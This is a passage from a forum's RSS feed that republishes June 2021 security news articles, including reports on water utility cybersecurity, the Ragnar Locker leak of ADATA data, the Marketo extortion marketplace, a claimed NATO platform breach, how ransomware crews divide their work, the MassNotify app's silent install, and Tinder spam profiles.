			When the Chrome 'Experiments' page opens, search for 'Device Authentication for Incognito' and enable it.
			<div>
				<figure>
					<img alt="Enabling experimental feature" data-ratio="194.55" style="width: 275px; height: auto;" width="275" src="https://www.bleepstatic.com/images/news/web-browsers/chrome/incognito-faceid-lock/chrome-flag.jpg">
					<figcaption>
						Enabling experimental feature
					</figcaption>
				</figure>
			</div>
		</li>
		<li>
			Now close and reopen the Chrome browser.
		</li>
		<li>
			When Chrome is started again, go into Settings &gt; Privacy and enable the 'Lock Incognito Tabs when you close Chrome' setting as shown below.
			<div>
				<figure>
					<img alt="Chrome for iOS Privacy settings" data-ratio="194.55" style="width: 275px; height: auto;" width="275" src="https://www.bleepstatic.com/images/news/web-browsers/chrome/incognito-faceid-lock/settings.jpg">
					<figcaption>
						Chrome for iOS Privacy settings
					</figcaption>
				</figure>
			</div>
		</li>
	</ol>

	<p>
		Now that the feature is enabled, every time you try to access your Chrome Incognito tabs, it will prompt you to unlock them with Face ID.
	</p>

	<p>
		 
	</p>

	<p>
		To disable this feature, simply toggle off the 'Lock Incognito Tabs When You Close Chrome' setting in the settings.
	</p>
</div>

<p>
	 
</p>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/google/google-chrome-on-ios-is-getting-an-enhanced-privacy-feature/" rel="external nofollow">Google Chrome on iOS is getting an enhanced privacy feature</a>
</p>
]]></description><guid isPermaLink="false">769</guid><pubDate>Mon, 21 Jun 2021 21:27:09 +0000</pubDate></item><item><title>How Cyber Safe is Your Drinking Water Supply?</title><link>https://nsaneforums.com/news/security-privacy-news/how-cyber-safe-is-your-drinking-water-supply-r766/</link><description><![CDATA[<header>
	<div>
		<h1>
			How Cyber Safe is Your Drinking Water Supply?
		</h1>
	</div>
</header>

<div id="primary">
	<div id="content" role="main">
		<article id="post-56022">
			<header>
				<div>
					<div>
						 
					</div>
				</div>
			</header>

			<div>
				<p>
					Amid multiple recent reports of hackers breaking into and tampering with drinking water treatment systems comes a new industry survey with some sobering findings: A majority of the 52,000 separate drinking water systems in the United States still haven’t inventoried some or any of their information technology systems — a basic first step in protecting networks from cyberattacks.
				</p>

				<p>
					 
				</p>

				<p>
					<img alt="drinkwatersupply.jpg" data-ratio="75.00" loading="lazy" width="500" src="https://krebsonsecurity.com/wp-content/uploads/2021/02/drinkwatersupply.jpg">
				</p>

				<p>
					 
				</p>

				<p>
					The <a href="https://www.waterisac.org" rel="external nofollow" target="_blank">Water Information Sharing and Analysis Center</a> (WaterISAC) — an industry group that tries to facilitate information sharing and the adoption of best practices among utilities in the water sector — surveyed roughly 600 employees of water and wastewater treatment facilities nationwide, and found 37.9 percent of utilities have identified all IT-networked assets, with an additional 21.7 percent working toward that goal.
				</p>

				<p>
					 
				</p>

				<p>
					The ISAC found when it comes to IT systems tied to “operational technology” (OT) — systems responsible for monitoring and controlling the industrial operation of these utilities and their safety features — just 30.5 percent had identified all OT-networked assets, with an additional 22.5 percent working to do so.
				</p>

				<p>
					 
				</p>

				<p>
					“Identifying IT and OT assets is a critical first step in improving cybersecurity,” the report concluded. “An organization cannot protect what it cannot see.”
				</p>

				<p>
					 
				</p>

				<p>
					It’s also hard to see threats you’re not looking for: 67.9 percent of water systems reported no IT security incidents in the last 12 months, a somewhat unlikely scenario.
				</p>

				<p>
					 
				</p>

				<p>
					Michael Arceneaux, managing director of the WaterISAC, said the survey shows much room for improvement and a need for support and resources.
				</p>

				<p>
					 
				</p>

				<p>
					“Threats are increasing, and the sector, EPA, CISA and USDA need to collaborate to help utilities prevent and recover from compromises,” Arceneaux <a href="https://twitter.com/criticalh2o/status/1405638206301868032" rel="external nofollow" target="_blank">said on Twitter</a>.
				</p>

				<p>
					 
				</p>

				<p>
					While documenting each device that needs protection is a necessary first step, a number of recent cyberattacks on water treatment systems have been blamed on a failure to properly secure water treatment employee accounts that can be used for remote access.
				</p>

				<p>
					 
				</p>

				<p>
					In April, federal prosecutors unsealed an indictment against a 22-year-old from Kansas who’s accused of <a href="https://www.vice.com/en/article/3anx79/feds-indict-kansas-man-for-allegedly-hacking-into-water-supply" rel="external nofollow" target="_blank">hacking into a public water system in 2019</a>. The defendant in that case is a former employee of the water district he allegedly hacked.
				</p>

				<p>
					 
				</p>

				<p>
					In February, we learned that <a href="https://krebsonsecurity.com/2021/02/whats-most-interesting-about-the-florida-water-system-hack-that-we-heard-about-it-at-all/" rel="external nofollow" target="_blank">someone hacked into the water treatment plant in Oldsmar, Fla.</a> and briefly increased the amount of sodium hydroxide (a.k.a. lye, used to control acidity in the water) to 100 times the normal level. That incident stemmed from stolen or leaked employee credentials for TeamViewer, a popular program that lets users remotely control their computers.
				</p>

				<p>
					 
				</p>

				<p>
					In January, a hacker tried to poison a water treatment plant that served parts of the San Francisco Bay Area, <a href="https://www.nbcnews.com/tech/security/hacker-tried-poison-calif-water-supply-was-easy-entering-password-rcna1206" rel="external nofollow" target="_blank">reports</a> Kevin Collier for NBCNews. The hacker in that case also had the username and password for a former employee’s TeamViewer account.
				</p>

				<p>
					 
				</p>

				<div id="attachment_56035">
					<img alt="waterisac-challenges.png" aria-describedby="caption-attachment-56035" data-ratio="60.14" loading="lazy" sizes="(max-width: 758px) 100vw, 758px" srcset="https://krebsonsecurity.com/wp-content/uploads/2021/06/waterisac-challenges.png 1023w, https://krebsonsecurity.com/wp-content/uploads/2021/06/waterisac-challenges-768x439.png 768w, https://krebsonsecurity.com/wp-content/uploads/2021/06/waterisac-challenges-782x447.png 782w" src="https://krebsonsecurity.com/wp-content/uploads/2021/06/waterisac-challenges.png">
					<p id="caption-attachment-56035">
						Image: WaterISAC.
					</p>
				</div>

				<p>
					 
				</p>

				<p>
					Andrew Hildick-Smith is a consultant who served more than 15 years managing remote access systems for the Massachusetts Water Resources Authority. He said the percentage of companies that reported already having inventoried all of their IT systems is roughly equal to the number of larger water utilities (greater than 50,000 population) that recently had to certify to the Environmental Protection Agency (EPA) that they are compliant with <a href="https://www.epa.gov/ground-water-and-drinking-water/americas-water-infrastructure-act-2018-awia" rel="external nofollow" target="_blank">the Water Infrastructure Act of 2018</a>.
				</p>

				<p>
					 
				</p>

				<p>
					The water act gives utilities serving between 3,300 and 50,000 residents until the end of this month to complete a cybersecurity risk and resiliency assessment.
				</p>

				<p>
					 
				</p>

				<p>
					But Hildick-Smith said the vast majority of the nation’s water utilities — tens of thousands of them — serve fewer than 3,300 residents, and those utilities currently do not have to report to the EPA about their cybersecurity practices (or the lack thereof).
				</p>

				<p>
					 
				</p>

				<p>
					“A large number of utilities — probably close to 40,000 of them — are small enough that they haven’t been asked to do anything,” he said. “But some of those utilities are kind of doing cybersecurity based on self motivation rather than any requirement.”
				</p>

				<p>
					 
				</p>

				<p>
					According to the WaterISAC, a great many of the nation’s water utilities are subject to economic disadvantages typical of rural and urban communities.
				</p>

				<p>
					 
				</p>

				<p>
					“Others do not have access to a cybersecurity workforce,” the report explains. “Operating in the background is that these utilities are struggling to maintain and replace infrastructure, maintain revenues while addressing issues of affordability, and comply with safe and clean water regulations.”
				</p>

				<p>
					 
				</p>

				<p>
					The report makes the case for federal funding of state and local systems to provide cybersecurity training, tools and services for those in charge of maintaining IT systems, noting that 38 percent of water systems allocate less than 1 percent of their annual budgets to cybersecurity.
				</p>

				<p>
					 
				</p>

				<p>
					As the recent hacking incidents above can attest, enabling some form of multi-factor authentication for remote access can blunt many of these attacks.
				</p>

				<p>
					 
				</p>

				<p>
					However, the sharing of remote access credentials among water sector employees may be a contributing factor in these recent incidents, since organizations that let multiple employees use the same account also are less likely to have any form of multi-factor enabled.
				</p>

				<p>
					 
				</p>

				<p>
					A copy of the Water ISAC report is available <a href="https://www.waterisac.org/system/files/articles/FINAL_2021_WaterSectorCoordinatingCouncil_Cybersecurity_State_of_the_Industry-17-JUN-2021.pdf" rel="external nofollow" target="_blank">here</a> (PDF).
				</p>
			</div>
		</article>
	</div>
</div>

<p>
	 
</p>

<p>
	 
</p>

<p>
	<a href="https://krebsonsecurity.com/2021/06/how-cyber-safe-is-your-drinking-water-supply/" rel="external nofollow">How Cyber Safe is Your Drinking Water Supply?</a>
</p>
]]></description><guid isPermaLink="false">766</guid><pubDate>Mon, 21 Jun 2021 21:17:37 +0000</pubDate></item><item><title>ADATA suffers 700 GB data leak in Ragnar Locker ransomware attack</title><link>https://nsaneforums.com/news/security-privacy-news/adata-suffers-700-gb-data-leak-in-ragnar-locker-ransomware-attack-r765/</link><description><![CDATA[<h1>
	ADATA suffers 700 GB data leak in Ragnar Locker ransomware attack
</h1>

<div>
	<p>
		 
	</p>

	<p>
		The Ragnar Locker ransomware gang have published download links for more than 700GB of archived data stolen from Taiwanese memory and storage chip maker ADATA.
	</p>

	<p>
		 
	</p>

	<p>
		A set of 13 archives, allegedly containing sensitive ADATA files, was publicly available on a cloud-based storage service, at least for a time.
	</p>

	<h3>
		Large ADATA file archives 
	</h3>

	<p>
		On Saturday, the ransomware actor published on their leak site the download links to a new set of ADATA corporate documents, warning interested parties that the links would not survive for long.
	</p>

	<p>
		 
	</p>

	<p>
		Ragnar Locker’s premonition proved true, as the MEGA storage service, where the gang chose to host the illegally obtained data, reacted and closed the threat actor’s account, denying access to any files they had shared publicly.
	</p>

	<p>
		 
	</p>

	<p>
		Two of the leaked archives are quite large, weighing over 100GB, but several of them that could have been easily downloaded are less than 1.1GB large.
	</p>

	<p>
		 
	</p>

	<p>
		Per the file metadata published by the threat actor, the largest archive is close to 300GB and its name gives no clue about what it might contain. Another large one is 117GB in size and its name is just as nondescript as in the case of the first one (Archive#2).
	</p>

	<p>
		 
	</p>

	<p>
		<img alt="ADATA files stolen by Ragnar Locker ransomware gang" data-ratio="75.10" src="https://www.bleepstatic.com/images/news/u/1100723/Ransomware/Ragnar%20Locker/ADATA_File-Leak.jpg">
	</p>

	<p>
		 
	</p>

	<p>
		Judging by the names of the archives, Ragnar Locker likely stole documents from ADATA containing financial information and non-disclosure agreements, among other types of details.
	</p>

	<p>
		 
	</p>

	<p>
		The ransomware attack on ADATA happened on May 23rd, 2021, forcing them to take systems offline, the <a href="https://www.bleepingcomputer.com/news/security/computer-memory-maker-adata-hit-by-ragnar-locker-ransomware/" target="_blank" rel="external nofollow">company told BleepingComputer</a>. As the Ragnar Locker leak clearly shows, ADATA did not pay the ransom and restored the affected systems on its own.
	</p>

	<p>
		 
	</p>

	<p>
		The ransomware actor claims to have stolen 1.5TB of sensitive files before deploying the encryption routine, saying that they took their time in the process because of the poor network defenses.
	</p>

	<div>
		<p>
			 
		</p>

		<p>
			“So then, as usual, we did offer to cooperate to fix the vulnerabilities and to restore their system and of course, avoid any publication regarding this issue, however, they didn't value much their own private information, as well as partners/clients/employees/customers information” - Ragnar Locker
		</p>
	</div>

	<p>
		 
	</p>

	<p>
		The recently leaked batch of archives is the second one that Ragnar Locker ransomware publishes for ADATA. The previous one was posted earlier this month and includes four small 7-zip archives (less than 250MB together) that can still be downloaded.
	</p>
</div>

<p>
	 
</p>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/security/adata-suffers-700-gb-data-leak-in-ragnar-locker-ransomware-attack/" rel="external nofollow">ADATA suffers 700 GB data leak in Ragnar Locker ransomware attack</a>
</p>
]]></description><guid isPermaLink="false">765</guid><pubDate>Mon, 21 Jun 2021 21:09:29 +0000</pubDate></item><item><title>Data leak marketplace pressures victims by emailing competitors</title><link>https://nsaneforums.com/news/security-privacy-news/data-leak-marketplace-pressures-victims-by-emailing-competitors-r764/</link><description><![CDATA[<h1>
	Data leak marketplace pressures victims by emailing competitors
</h1>

<div>
	<p>
		 
	</p>

	<p>
		The Marketo data theft marketplace is applying maximum pressure on victims by emailing their competitors and offering sample packs of the stolen data.
	</p>

	<p>
		 
	</p>

	<p>
		Last month, BleepingComputer reported that cybercriminals started to create <a href="https://www.bleepingcomputer.com/news/security/data-leak-marketplaces-aim-to-take-over-the-extortion-economy/" target="_blank" rel="external nofollow">dedicated data-theft extortion marketplaces</a> that exist solely to sell stolen data.
	</p>

	<p>
		 
	</p>

	<p>
		The data sold on these sites are obtained through the marketplace's own attacks, from other threat actors, or by collecting data released in other attacks, such as ransomware or website data breaches.
	</p>

	<p>
		 
	</p>

	<p>
		The stolen data is sold for as low as $100 to tens of thousands of dollars depending on the marketplace.
	</p>

	<h2>
		Under pressure
	</h2>

	<p>
		One of these marketplaces, known as Marketo, is now taking it a step further and emailing the victim's competitors to offer samples of the stolen data and entice them into purchasing it.
	</p>

	<p>
		 
	</p>

	<p>
		In April, Marketo claimed to have breached a large, heavy machinery and defense technology company and began selling their stolen data.
	</p>

	<p>
		 
	</p>

	<p>
		After what we assume was a failure to find any buyers, Marketo started emailing the communication managers of the victim's competitors to offer a "demo pack" of the stolen data.
	</p>

	<p>
		 
	</p>

	<p>
		"Hello, we are Marketo and we know you have a competitor - [redacted]. So we would like to inform you that we attacked them and downloaded quite a bit of data," read the email shared with BleepingComputer.
	</p>

	<p>
		 
	</p>

	<p>
		"We have confidential and personal data, info about their tax payments, clients and partners. That might significantly lower the NASDAQ price."
	</p>

	<div>
		<figure>
			<img data-ratio="20.97" style="width: 720px; height: 151px;" width="720" alt="marketo-email-victim.jpg" src="https://www.bleepstatic.com/images/news/security/d/data-marketplaces/emailing-competitors/marketo-email-victim.jpg">
			<figcaption>
				Email sent to victim's competitors
			</figcaption>
		</figure>
	</div>

	<p>
		It is not clear if Marketo were hoping competitors would purchase the data to learn corporate secrets or to pay to damage the reputation of their competitors.
	</p>

	<p>
		 
	</p>

	<p>
		The list of competitors that received this email includes multi-national billion-dollar companies whose names would be immediately recognizable to everyone.
	</p>

	<p>
		 
	</p>

	<p>
		Targeting victims' competitors to pressure a ransom payment or even encourage other companies to purchase stolen data is not new.
	</p>

	<p>
		 
	</p>

	<p>
		After the Clop ransomware gang went on a <a href="https://www.bleepingcomputer.com/news/security/global-accellion-data-breaches-linked-to-clop-ransomware-gang/" target="_blank" rel="external nofollow">hacking spree targeting Accellion FTA</a> secure file transfer devices to steal their hosted data, they also performed a similar tactic as Marketo.
	</p>

	<p>
		 
	</p>

	<p>
		After not receiving ransom payments from various victims, Clop began emailing competitors and journalists with information about the attacks to pressure the victim.
	</p>

	<p>
		 
	</p>

	<p>
		For one of these victims, <a href="https://www.bleepingcomputer.com/news/security/ransomware-gang-urges-victims-customers-to-demand-a-ransom-payment/" target="_blank" rel="external nofollow">Clop also emailed the company's customers</a> and told them that their "phone, email, address, credit card information and social security number" would soon be leaked unless they "Call or write to this store and ask to protect your privacy!!!!"
	</p>
</div>

<p>
	 
</p>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/security/data-leak-marketplace-pressures-victims-by-emailing-competitors/" rel="external nofollow">Data leak marketplace pressures victims by emailing competitors</a>
</p>
]]></description><guid isPermaLink="false">764</guid><pubDate>Mon, 21 Jun 2021 21:07:24 +0000</pubDate></item><item><title>NATO's Cloud Platform has been Hacked</title><link>https://nsaneforums.com/news/security-privacy-news/natos-cloud-platform-has-been-hacked-r761/</link><description><![CDATA[<p>
	<span style="font-size:36px;"><strong>NATO's Cloud Platform has been Hacked</strong></span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:24px;"><strong>SOA &amp; IdM platform has been breached after Everis hack</strong></span>
</p>

<p>
	 
</p>

<p>
	<strong>NATO uses the SOA &amp; IdM platform and classified it as secret while it was used to handle several essential functions within the Polaris program.</strong>
</p>

<p>
	 
</p>

<p>
	Part of NATO's IT modernization program, Polaris employs the SOA &amp; IdM platform and was created to provide centralized security, integration, and hosting information management. As it handles several critical functions, the platform was classified as secret by the military alliance.
</p>

<p>
	 
</p>

<p>
	The hackers claim that they managed to make copies of the data on this platform using a backdoor and that they tried to blackmail Everis. They went further and made jokes about sending the stolen data to the Russian intelligence services.
</p>

<p>
	 
</p>

<p>
	<strong>Hackers wanted to slow down Polaris development</strong>
</p>

<p>
	<br />
	Paul Howland, Polaris Program Officer explained the benefits of the program: “This project has the potential to be a game-changer in how NATO will develop and deploy its operational services in the future. It will drive innovation and reduce costs. Operational by ensuring a much greater reuse of deployed capacities".
</p>

<p>
	 
</p>

<p>
	The hackers behind the attack said they were initially unaware that they could exploit a vulnerability on the NATO platform. Initially, they focused only on Everis' corporate data in Latin America, as NATO had said it was prepared to take action in the event of a cyber threat. To their surprise, one of the secure NATO platforms was among the subsidiaries of Everis.
</p>

<p>
	 
</p>

<p>
	The hackers began to steal more data from Everis networks after they analyzed the company and found documents related to drones and military defense systems. They justified the activity of slowing down the development of the Polaris program by saying that they were not "for peace on earth and in the cyber world”.
</p>

<p>
	 
</p>

<p>
	The hackers demanded from Everis a ransom of XMR 14,500 so that they would not associate its identity to the LATAM Airlines data hack. They have also asked for this ransom in exchange for not disclosing any data from NATO.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://news.softpedia.com/news/nato-s-cloud-platform-has-been-hacked-533282.shtml" rel="external nofollow">Source</a></strong>
</p>

<p>
	 
</p>
]]></description><guid isPermaLink="false">761</guid><pubDate>Mon, 21 Jun 2021 17:38:02 +0000</pubDate></item><item><title>Inside a ransomware attack: How dark webs of cybercriminals collaborate to pull one off</title><link>https://nsaneforums.com/news/security-privacy-news/inside-a-ransomware-attack-how-dark-webs-of-cybercriminals-collaborate-to-pull-one-off-r756/</link><description><![CDATA[<p>
	<span style="font-size:18px;"><strong>Inside a ransomware attack: How dark webs of cybercriminals collaborate to pull one off</strong></span>
</p>

<p>
	 
</p>

<p>
	In their Carbis Bay communique, the G7 announced their intention to work together to tackle ransomware groups. Days later, U.S. president Joe Biden met with Russian president Vladimir Putin, where an extradition process to bring Russian cybercriminals to justice in the U.S. was discussed. Putin reportedly agreed in principle, but insisted that extradition be reciprocal. Time will tell if an extradition treaty can be reached. But if it is, who exactly should be extradited—and what for?
</p>

<p>
	 
</p>

<p>
	The problem for law enforcement is that ransomware—a form of malware used to steal organizations' data and hold it to ransom—is a very slippery fish. Not only is it a blended crime, including different offenses across different bodies of law, but it's also a crime that straddles the remit of different policing agencies and, in many cases, countries. And there is no one key offender. Ransomware attacks involve a distributed network of different cybercriminals, often unknown to each other to reduce the risk of arrest.
</p>

<p>
	 
</p>

<p>
	So it's important to look at these attacks in detail to understand how the U.S. and the G7 might go about tackling the increasing number of ransomware attacks we've seen during the pandemic, with at least 128 publicly disclosed incidents taking place globally in May 2021.
</p>

<p>
	 
</p>

<p>
	What we find when we connect the dots is a professional industry far removed from the organized crime playbook, which seemingly takes its inspiration straight from the pages of a business studies manual.
</p>

<p>
	 
</p>

<p>
	The ransomware industry is responsible for a huge amount of disruption in today's world. Not only do these attacks have a crippling economic effect, costing billions of dollars in damage, but the stolen data acquired by attackers can continue to cascade down through the crime chain and fuel other cybercrimes.
</p>

<p>
	 
</p>

<p>
	Ransomware attacks are also changing. The criminal industry's business model has shifted towards providing ransomware as a service. This means operators provide the malicious software, manage the extortion and payment systems and manage the reputation of the "brand". But to reduce their exposure to the risk of arrest, they recruit affiliates on generous commissions to use their software to launch attacks.
</p>

<p>
	 
</p>

<p>
	This has resulted in an extensive distribution of criminal labor, where the people who own the malware are not necessarily the same as those who plan or execute ransomware attacks. To complicate things further, both are assisted in committing their crimes by services offered by the wider cybercrime ecosystem.
</p>

<p>
	 
</p>

<p>
	<strong>How do ransomware attacks work?</strong>
</p>

<p>
	 
</p>

<p>
	There are several stages to a ransomware attack, which I have teased out after analyzing over 4,000 attacks from between 2012 and 2021.
</p>

<p>
	 
</p>

<p>
	First, there's the reconnaissance, where criminals identify potential victims and access points to their networks. This is followed by a hacker gaining "initial access", using log-in credentials bought on the dark web or obtained through deception.
</p>

<p>
	 
</p>

<p>
	Once initial access is gained, attackers seek to escalate their access privileges, allowing them to search for key organizational data that will cause the victim the most pain when stolen and held to ransom. This is why hospital medical records and police records are often the target of ransomware attacks. This key data is then extracted and saved by criminals—all before any ransomware is installed and activated.
</p>

<p>
	 
</p>

<p>
	Next comes the victim organization's first sign that they've been attacked: the ransomware is deployed, locking organizations from their key data. The victim is quickly named and shamed via the ransomware gang's leak website, located on the dark web. That "press release" may also feature threats to share stolen sensitive data, with the aim of frightening the victim into paying the ransom demand.
</p>

<p>
	 
</p>

<p>
	Successful ransomware attacks see the ransom paid in cryptocurrency, which is difficult to trace, and converted and laundered into fiat currency. Cybercriminals often invest the proceeds to enhance their capabilities—and to pay affiliates—so they don't get caught.
</p>

<p>
	 
</p>

<p>
	<strong>The cybercrime ecosystem</strong>
</p>

<p>
	 
</p>

<p>
	While it's feasible that a suitably skilled offender could perform each of the functions, it's highly unlikely. To reduce the risk of being caught, offender groups tend to develop and master specialist skills for different stages of an attack. These groups benefit from this inter-dependency, as it offsets criminal liability at each stage.
</p>

<p>
	 
</p>

<p>
	And there are plenty of specializations in the cybercrime underworld. There are spammers, who hire out spamware-as-a-service software that phishers, scammers, and fraudsters use to steal people's credentials, and databrokers who trade these stolen details on the dark web.
</p>

<p>
	 
</p>

<p>
	These might be purchased by "initial access brokers", who specialize in gaining initial entry to computer systems before selling on those access details to would-be ransomware attackers. These attackers often engage with crimeware-as-a-service brokers, who hire out ransomware-as-a-service software as well as other malware.
</p>

<p>
	 
</p>

<p>
	To coordinate these groups, darkmarketeers provide online markets where criminals can openly sell or trade services, usually via the Tor network on the dark web. Monetisers are there to launder cryptocurrency and turn it into fiat currency, while negotiators, representing both victim and offender, are hired to settle the ransom amount.
</p>

<p>
	 
</p>

<p>
	This ecosystem is constantly evolving. For example, a recent development has been the emergence of the "ransomware consultant", who collects a fee for advising offenders at key stages of an attack.
</p>

<p>
	 
</p>

<p>
	<strong>Arresting offenders</strong>
</p>

<p>
	 
</p>

<p>
	Governments and law enforcement agencies appear to be ramping up their efforts to tackle ransomware offenders, following a year blighted by their continued attacks. As the G7 met in Cornwall in June 2021, Ukrainian and South Korean police forces coordinated to arrest elements of the infamous CL0P ransomware gang. In the same week, Russian national Oleg Koshkin was convicted by a U.S. court for running a malware encryption service that criminal groups use to perform cyberattacks without being detected by antivirus solutions.
</p>

<p>
	 
</p>

<p>
	While these developments are promising, ransomware attacks are a complex crime involving a distributed network of offenders. As the offenders have honed their methods, law enforcers and cybersecurity experts have tried to keep pace. But the relative inflexibility of policing arrangements, and the lack of a key offender (Mr or Mrs Big) to arrest, may always keep them one step behind the cybercriminals—even if an extradition treaty is struck between the U.S. and Russia.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://techxplore.com/news/2021-06-ransomware-dark-webs-cybercriminals-collaborate.html" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">756</guid><pubDate>Mon, 21 Jun 2021 13:55:34 +0000</pubDate></item><item><title>Google force installs Massachusetts MassNotify app on Android phones</title><link>https://nsaneforums.com/news/security-privacy-news/google-force-installs-massachusetts-massnotify-app-on-android-phones-r735/</link><description><![CDATA[<h1>
	Google force installs Massachusetts MassNotify app on Android phones
</h1>

<div>
	<p>
		 
	</p>

	<p>
		Google is force-installing a Massachusetts COVID-19 tracking app on residents' Android devices without an easy way to uninstall it.
	</p>

	<p>
		 
	</p>

	<p>
		For the past few days, <a href="https://play.google.com/store/apps/details?id=gov.ma.covid19.exposurenotifications.v3&amp;showAllReviews=true" rel="external nofollow" target="_blank">users have reported</a> that Google silently installed the Massachusetts 'MassNotify' app on their devices without the ability to open it or find it in the Google Play Store.
	</p>

	<p>
		 
	</p>

	<p>
		"This installed silently on my daughter's phone without consent or notification. She cannot have installed it herself since we use Family Link and we have to approve all app installs. I have no idea how they pulled this off, but it had to involve either Google, or Samsung, or both," a user wrote in a review on the Google Play Store.
	</p>

	<p>
		 
	</p>

	<p>
		"Normal apps can't just install themselves. I'm not sure what's going on here, but this doesn't count as 'voluntary'. We need information, and we need it now, folks."
	</p>

	<p>
		 
	</p>

	<p>
		MassNotify is Massachusetts' COVID-19 contact tracing app that allows users who have opted into Android's 'COVID-19 Exposure Notifications' feature to be warned when exposed to the virus.
	</p>

	<p>
		 
	</p>

	<p>
		When opting into this feature, users can select the country and state they want to receive notifications from, and the corresponding state's app will be installed on the device.
	</p>

	<div>
		<figure>
			<img alt="Opting in to the MassNotify app" data-ratio="211.07" style="width: 253px; height: auto;" width="253" src="https://www.bleepstatic.com/images/news/companies/google/mass-notify/massnotify-optin.jpg">
			<figcaption>
				Opting in to the MassNotify app
			</figcaption>
		</figure>
	</div>

	<p>
		However, Android users <a href="https://news.ycombinator.com/item?id=27560689" rel="external nofollow" target="_blank">state</a> that they have received the application even though they have not turned on the Android Exposure Notification settings on their device.
	</p>

	<p>
		 
	</p>

	<p>
		<a href="https://news.ycombinator.com/item?id=27563203" rel="external nofollow" target="_blank">A Y Combinator Hacker News reader</a> contacted the MassNotify Help Desk and was told that the appearance of the MassNotify app in their app list means that it is installed but not necessarily active.
	</p>

	<blockquote>
		<p>
			"The appearance of MassNotify in the app list does not mean that MassNotify is enabled on your phone. The presence of the app merely means that MassNotify has been made available as an option in your phone's settings if you wish to enable it. For more information about this, please see this help center article from Google: <a href="https://support.google.com/android/answer/10775533" rel="external nofollow">https://support.google.com/android/answer/10775533</a>
		</p>

		<p>
			 
		</p>

		<p>
			You can see whether MassNotify is active by going to Settings -&gt; Google -&gt; COVID-19 Exposure Notifications. The “Use Exposure Notifications” toggle at the top of the page will show you whether MassNotify is active or not. From this screen, you can also enable or disable MassNotify at any time."
		</p>
	</blockquote>

	<p>
		Many people, though, are reporting that they cannot find any icons for the app, and it is not found when searching for 'MassNotify' in the Google Play Store, and thus cannot uninstall the force-installed app.
	</p>

	<div>
		<figure>
			<img alt="MassNotify not found in the Google Play Store" data-ratio="127.79" style="width: 421px; height: auto;" width="421" src="https://www.bleepstatic.com/images/news/companies/google/mass-notify/not-found.jpg">
			<figcaption>
				MassNotify not found in the Google Play Store
			</figcaption>
		</figure>
	</div>

	<p>
		Instead, users have to go to the <a href="https://play.google.com/store/apps/details?id=gov.ma.covid19.exposurenotifications.v3" rel="external nofollow" target="_blank">MassNotify Google Play Store URL</a> that uses the app's internal name of 'Exposure Notifications Settings Feature - MA' and uninstall it from there.
	</p>

	<div>
		<figure>
			<img alt="Uninstalling the MassNotify app" data-ratio="211.07" style="width: 253px; height: auto;" width="253" src="https://www.bleepstatic.com/images/news/companies/google/mass-notify/uninstall-mass-notify.jpg">
			<figcaption>
				Uninstalling the MassNotify app
			</figcaption>
		</figure>
	</div>

	<p>
		BleepingComputer has contacted Google to find out why the app was installed but has not heard back at this time.
	</p>
</div>

<p>
	 
</p>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/security/google-force-installs-massachusetts-massnotify-app-on-android-phones/" rel="external nofollow">Google force installs Massachusetts MassNotify app on Android phones</a>
</p>
]]></description><guid isPermaLink="false">735</guid><pubDate>Sat, 19 Jun 2021 22:49:37 +0000</pubDate></item><item><title>Tinder spam campaign hides "handwritten" links in profile images</title><link>https://nsaneforums.com/news/security-privacy-news/tinder-spam-campaign-hides-handwritten-links-in-profile-images-r734/</link><description><![CDATA[<h1>
	Tinder spam campaign hides "handwritten" links in profile images
</h1>

<div>
	<p>
		 
	</p>

	<p>
		A new trend has emerged on dating apps like Tinder with spammers sneaking in links within profile images.
	</p>

	<p>
		 
	</p>

	<p>
		Multiple such Tinder spam profiles reviewed by BleepingComputer shared some common characteristics.
	</p>

	<p>
		 
	</p>

	<p>
		For example, nearly every profile had an image of an attractive person followed by another one showing an NSFW domain handwritten on a placard.
	</p>

	<h2>
		Spammers abuse profile images to promote spam domains
	</h2>

	<p>
		In a recent trend observed by BleepingComputer, a noticeable number of fake dating profiles have flooded Tinder.
	</p>

	<p>
		 
	</p>

	<p>
		These serve no purpose other than luring users in to visit spam links—leading to third-party dating or NSFW websites.
	</p>

	<p>
		 
	</p>

	<p>
		However, unlike with other dating apps, where spammers send unsolicited links to users via direct text messages, this slightly more clever technique abuses profile pictures to sneak in images of handwritten domains within them.
	</p>

	<p>
		 
	</p>

	<p>
		These fake Tinder profiles, seen by BleepingComputer, comprised mainly two profile pictures.
	</p>

	<p>
		 
	</p>

	<p>
		The primary profile picture is often that of an attractive person, followed by a second image with the spam domain inscribed on a placard or piece of paper, as shown below:
	</p>

	<div>
		<figure>
			<img alt="tinder spam profile" data-ratio="100.94" style="width: 534px; height: auto;" width="534" src="https://www.bleepstatic.com/images/news/u/1164866/2021/Jun%202021/tinder%20spam/profile-image-spam.jpeg">
			<figcaption>
				Fake Tinder profile with an image of a real person (redacted) followed by another one with a spam placard<br>
				Source: BleepingComputer
			</figcaption>
		</figure>
	</div>

	<p>
		Moreover, a provocative bio text is yet another hook to lure the user into visiting the NSFW links.
	</p>

	<p>
		 
	</p>

	<p>
		What keeps this trend going is that such custom-made images containing handwritten versions of links are much harder to detect or remove automatically en masse.
	</p>

	<p>
		 
	</p>

	<p>
		Automatically searching profiles for text strings representing malicious domains (e.g. in a user's bio) is a far easier job for any AI.
	</p>

	<h2>
		Dating apps continue to battle growing spam
	</h2>

	<p>
		Although Tinder might be a victim of this new trend, popular dating apps continue to battle the problem of growing spam and fake profiles.
	</p>

	<p>
		 
	</p>

	<p>
		For example, in the past few weeks, Grindr users have been receiving unsolicited links via direct messages from "blank" profiles that typically have no bio or a profile picture:
	</p>

	<div>
		<figure>
			<img alt="Grindr spam" data-ratio="99.63" style="width: 540px; height: auto;" width="540" src="https://www.bleepstatic.com/images/news/u/1164866/2021/Jun%202021/tinder%20spam/grindr-spam.jpg">
			<figcaption>
				Spammers sending unsolicited links in direct messages on Grindr<br>
				Source: BleepingComputer
			</figcaption>
		</figure>
	</div>

	<p>
		Other than being an obvious nuisance, such practices by malicious actors, and the very presence of fake profiles on online dating apps, pose serious risks to the safety and privacy of legitimate users.
	</p>

	<p>
		 
	</p>

	<p>
